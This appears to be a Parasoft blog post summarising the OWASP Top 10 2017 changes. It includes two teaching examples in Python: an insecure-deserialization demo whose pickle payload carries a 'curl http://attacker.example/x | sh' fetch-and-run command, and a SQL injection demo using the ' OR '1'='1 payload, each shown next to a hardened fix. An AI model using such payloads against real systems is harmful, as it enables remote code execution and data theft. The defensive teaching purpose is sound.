Supporting the new 2017 Update to the OWASP Top 10
OWASP Top 10 – 2017 Update
Today OWASP released the latest version of the OWASP Top 10 – 2017. This application security list has become one of the most important security standards available, and I'm excited to say that static analysis configurations for Parasoft tools that support the 2017 list are already available on the Parasoft forum. We know this standard is important for you, and we’ve worked hard to make sure you can get started right away, today, now!
Learn more about the 2017 OWASP update below.
OWASP Top 10 Overview
For many years now, the Open Web Application Security Project (OWASP) has been a great resource of information and training about application security. Every few years, they put together the well-known OWASP Top 10 list that lays out important current security issues facing web developers. Over time, the standard has become perhaps the most common starting place for organizations getting started with securing their web applications.
And for good reason – the OWASP Top 10 is built from several kinds of evidence and is updated to reflect new security risks. The primary source is vulnerability data contributed by AppSec firms and consultancies, which shows which problems are actually plaguing organizations in the real world. For 2017, two of the ten items (A8:2017 – Insecure Deserialization and A10:2017 – Insufficient Logging and Monitoring) were selected by a community survey rather than from that data, to capture issues practitioners consider important but that are hard to detect automatically.
So, what’s new for 2017? As the new document says:
“We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-written each risk from the ground up, and added references to frameworks and languages that are now commonly used.”
Three items are new to the list:
- A4:2017 – XML External Entities (XXE) - attackers exploit weakly configured XML processors that resolve external entities, typically to read local files or reach internal services
- A8:2017 – Insecure Deserialization - deserializing untrusted data permits remote code execution, or manipulation of serialized objects (replay, privilege escalation) where code execution is not possible
- A10:2017 – Insufficient Logging and Monitoring - without adequate logging and alerting, malicious activity and breaches go undetected or are detected only after a significant delay, and incident response and digital forensics have little to work with
Two items were merged: A4:2013 – Insecure Direct Object References and A7:2013 – Missing Function Level Access Control became the new A5:2017 – Broken Access Control.
Two items were retired:
- A8:2013 – Cross-Site Request Forgery (CSRF) - as it turns out, most modern frameworks now protect against CSRF by default, and it was found in only about 5% of applications during the data analysis.
- A10:2013 – Unvalidated Redirects and Forwards - this one was found in about 8% of applications, just slightly less than the new XXE item that edged it out of the list.
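To make the A8:2017 – Insecure Deserialization entry above concrete, here is an added example (not code from the original post or from Parasoft) using Python's pickle, whose load path calls whatever callable the serialized data names. The `fake_shell` sink, the `UserPrefs` class and the "attacker" payload are constructed for the demo; in a real attack the callable would be something like `os.system`. The hardened side restricts which globals the unpickler may resolve, which is the standard mitigation when a safer format such as JSON cannot be adopted.

```python
import io
import pickle

# Constructed sink standing in for os.system: it records what an
# attacker-chosen callable would have run instead of actually running it.
executed_commands = []


def fake_shell(command):
    executed_commands.append(command)
    return 0


class UserPrefs:
    """Legitimate object an application might persist with pickle."""

    def __init__(self, theme, page_size):
        self.theme = theme
        self.page_size = page_size


class Exploit:
    """Attacker-crafted object. pickle serialises the callable and arguments
    returned by __reduce__, and pickle.loads() calls them on deserialisation,
    so the loading application executes attacker-chosen code."""

    def __reduce__(self):
        return (fake_shell, ("curl http://attacker.example/x | sh",))


def build_payloads():
    legit = pickle.dumps(UserPrefs("dark", 50))  # what the app expects
    malicious = pickle.dumps(Exploit())          # what an attacker submits
    return legit, malicious


def unsafe_load(blob):
    # Vulnerable: trusts the serialized data to name any importable global.
    return pickle.loads(blob)


# Allow-list of (module, name) pairs the unpickler may resolve. Anything else
# (os.system, subprocess.Popen, our fake_shell, ...) is refused.
ALLOWED_GLOBALS = {(UserPrefs.__module__, "UserPrefs")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(blob):
    # Hardened: same wire format, but only allow-listed classes can be built.
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def demo():
    legit, malicious = build_payloads()

    executed_commands.clear()
    unsafe_load(malicious)               # silently runs fake_shell(...)
    ran_during_unsafe_load = list(executed_commands)

    executed_commands.clear()
    prefs = safe_load(legit)             # legitimate data still round-trips
    try:
        safe_load(malicious)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True

    return {
        "unsafe_ran": ran_during_unsafe_load,
        "safe_prefs": (prefs.theme, prefs.page_size),
        "safe_blocked": blocked,
        "safe_ran": list(executed_commands),
    }


if __name__ == "__main__":
    print(demo())
```

The unsafe path executes the attacker's callable before the application ever sees a return value, which is why input validation after loading cannot help; the restriction has to happen inside deserialization, as `find_class` does here.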
Unsurprisingly, tainted data remains a huge problem, as we see in A1:2017 – Injection. This is a problem that disciplined defensive programming (parameterized queries, strict input validation, safe APIs) is very effective against, yet somehow we keep trying to test security in after the fact instead of building it in. It’s time to get serious and remove this one from the next Top 10 in 2020. Let’s all do our part!
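As an added example of the defensive programming the paragraph above calls for (this is not code from the original post or from Parasoft), the following shows the tainted-data problem in its most common form, SQL injection, with a constructed in-memory SQLite table. The vulnerable function concatenates user input into the query; the hardened version binds it as a parameter and additionally applies an allow-list check on the username format. The table contents and the `' OR '1'='1` payload are constructed for the demo.

```python
import re
import sqlite3

# Constructed sample data standing in for an application's user table.
SAMPLE_USERS = [
    ("alice", "hash-of-alice-pw", "admin"),
    ("bob", "hash-of-bob-pw", "user"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn, username):
    # Tainted input is pasted straight into the SQL text (CWE-89). The quote
    # in the attacker's value closes the literal and the rest becomes SQL.
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


# Allow-list for usernames; anything outside it is rejected before it reaches
# the database. This is defence in depth, not the primary control.
USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")


def find_user_safe(conn, username):
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    # Parameter binding: the driver sends the value separately from the SQL,
    # so it is never parsed as query syntax regardless of its content.
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


def demo():
    conn = make_db()
    payload = "' OR '1'='1"   # classic tautology: returns every row

    vulnerable_rows = find_user_vulnerable(conn, payload)
    try:
        safe_rows = find_user_safe(conn, payload)
        rejected = False
    except ValueError:
        safe_rows = []
        rejected = True

    return {
        "vulnerable": vulnerable_rows,      # leaks every user and role
        "safe_rejected": rejected,          # payload never reaches SQLite
        "safe": safe_rows,
        "safe_normal": find_user_safe(conn, "bob"),
    }


if __name__ == "__main__":
    print(demo())
```

Even without the allow-list check, binding the value with `?` returns no rows for the payload, because SQLite compares the column against the literal string `' OR '1'='1`. The validation step just fails fast and gives you a clean signal to log.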
A3:2017 – Sensitive Data Exposure is a great place to start if the EU General Data Protection Regulation (GDPR) is on your radar. The current countdown on the GDPR home page shows 185 days until enforcement starts, so start fixing your code today. The same work is obviously helpful in the U.S. for requirements such as PCI DSS and HIPAA. Protect your users’ data with proper access controls and with encryption both at rest and in transit. Data breaches are an all-too-common event.
One area that I love in particular about the latest OWASP Top 10 is that each Top 10 item now comes with explicit links to entries in the Common Weakness Enumeration (CWE), where you can learn more about what the problem is, why it matters, and how to eliminate the weakness. You can also easily find related issues this way for the items that matter most to you. The CWE Top 25 is a perfect next step once you have the OWASP Top 10 locked down.
What you should do:
First, go download the PDF for the OWASP Top 10 – 2017 and read it through. It’s rich with information about what each problem is and how to start removing it from your applications. Then, add it to your security policy and make sure your team of developers and testers is trained on it. Adding configurations for security tools like static analysis and penetration testing will help enforce this effort. At Parasoft, we have already put configurations for our static analysis tools in our forums.
Remember, the OWASP Top 10 is a starting point, not a destination. It lists the most important issues that are most likely to affect your web application. Once you’ve got a handle on it, you need to keep improving by using expanded standards like CWE and SEI CERT Secure Coding Standards. This will help you broaden your security footing and prepare you for the security challenges ahead.
Arthur has been involved in software security and test automation at Parasoft for over 25 years, helping research new methods and techniques (including 5 patents) while helping clients improve their software practices.